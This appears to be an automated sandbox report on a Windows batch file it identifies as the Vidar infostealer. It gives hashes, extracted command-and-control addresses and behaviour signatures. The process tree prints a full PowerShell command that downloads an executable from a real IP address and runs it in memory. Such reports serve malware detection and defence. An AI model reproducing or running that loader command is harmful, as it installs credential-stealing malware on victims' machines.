Analysis
-
max time kernel
4s -
max time network
6s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
22-01-2025 00:58
General
-
Target
Setup/Setup-install.bat
-
Size
10KB
-
MD5
13a2664aae1f59fe0dc94ff8fb4dfa06
-
SHA1
a783e4b0513e16b06fa7872e454860642148957e
-
SHA256
7b9db02ad489193d1b9a5d7d7edc41a69cbc69d5e15d8267c2bf52a25dd434f3
-
SHA512
082265517a550bb06f513ddc807536de67a0c8e6531897f4b27d2772bdcbd8307541d83e4d44c9c54beb86d326367716df3dffd29d3ba35077d6afc11477ebbc
-
SSDEEP
48:syolccKcrr30cFmyPYlyhhcKKIcKKWjJcKz3EcKcKcKfJiPhcK6cKEl559HccG5p:oXtCZuMdpf4a
Malware Config
Extracted
http://147.45.44.131/infopage/rwtvha.exe
http://147.45.44.131/infopage/rwtvha.exe
Extracted
vidar
fc0stn
https://t.me/w0ctzn
https://steamcommunity.com/profiles/76561199817305251
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Signatures
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Suspicious use of SetThreadContext 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'http://147.45.44.131/infopage/rwtvha.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d1xadanc\d1xadanc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6DC.tmp" "c:\Users\Admin\AppData\Local\Temp\d1xadanc\CSC58DEBD1ADFEC4645841858DAA9D7E7D2.TMP"4⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58e0194feda924f21b33373f980735623
SHA14704c4836a6ca501a1ab47597a2861f5b7d084ef
SHA25649745317518c17807acda505d5d9cfd675f1776888ed5a5769e2cc7762a8a745
SHA512535d30620717caa7e295a7ae4c58136c7fdaea3ba6f843d7f49ba3b1aefc3faa4122fac7097ab09cfa55f3da457fc56c34b768cd1734b34171d5912e9a579cdb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5a2d5a507cee6016f189d14c56bf58dca
SHA1cef120aebee20784b836b5411f40f11153e328d5
SHA256ebad663bc3b6c351b02e95364d6ffb38b5071da0e59cd38e7ccd845c04a2f65b
SHA51292f573a82986de5703e57cb783bbaf4814be7defc752af345e343245b65a222214afc74520805ec2a6d96d4a0e3f06f88ce04e2184e0e84e92152e5d0adec922
-
Filesize
652B
MD524f2be8864a8e60b9b0c0adde2a3bcef
SHA1c4f911a2d01ee288c2f3937ff0ffb90a1a66a790
SHA25623bc7e6795e5efcf15c6e71b839e424eca578821017d4c35242d45fe79a038ea
SHA512e2894b09ce809e043dd39b134f3ce19dac20511cebe188adb4c1ad81fcbac55c87dd4ceeac1e65553bf6b19ff3dcc1c0135bacee939df21350bc2ca16d3ad897
-
Filesize
10KB
MD5478b152b3b9b40edaf5edcc91037dab8
SHA189b9a0358abdbc20f0093421d020ceebe6e5d515
SHA256642d655cf208af1b6b913ef51c89134f794f185c4f661e5428b5e50dd5f36cbb
SHA5129000302d0cafe0421143491e73846bad7bb03b1863c7515452fb2789d6b7124a87c8b0e11ef8c8020d663f5849d7f8055413c0e2e7dfe35bf180dde508aba12e
-
Filesize
204B
MD5bc1d075ff2a923b2a287dc8757c9458d
SHA113ba87affb2acb929e92a1af8491779cd9cecfe9
SHA25612e33a90a852b6caf89c631d13ec54cdfbd1eabcdb0fa95a79239fe0afd51236
SHA512306efb444f803071a02846010b352139f59b1b02edfd2e926094618fd9ca5c82760e1e56413dc2eba6ea911fca206803d04f5ee3368fe50d37c91a791b85f2d9
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
56KB